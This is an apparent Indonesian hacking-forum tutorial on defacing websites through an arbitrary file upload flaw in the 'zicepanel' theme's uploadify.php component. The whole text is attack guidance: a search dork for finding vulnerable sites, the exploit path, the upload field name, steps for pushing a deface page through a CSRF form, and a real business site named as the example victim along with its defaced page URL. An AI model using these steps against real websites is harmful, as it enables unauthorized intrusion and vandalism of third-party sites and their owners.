Deface Poc Zicpanel

Deface Poc Zicpanel – Abritrary file upload



Bahan…


– dork = inurl:/themes/zicepanel/ (kembangin)
– script deface 
– Exploit = /themes/zicepanel/components/uploadify/uploadify.php 
– host file = Filedata
– Vuln = Blank! 
– csrf onlen


pertama tama kalian dorking  search engine kesayangan kalian


Cari yang vuln eaa

Terus masukin exploitnya..
Contoh :
https://www.meridahammocks.com/themes/zicepanel/components/uploadify/uploadify.php
Jika vuln akan blank kek di atas …

Terus masuk dah ke CSRF
Note : Post File pake Filedata
Lalu Upload sc kalian :v
Trus copas teks yg muncul itu lalu taro di target tdi..
Contoh : 
https://www.meridahammocks.com/yrcz6otgQTP2hZn1S9LKifpa4EYBMk5U.htm





Nah… Tinggal mirror :v

Oke udah gitu ae, sekian dan thx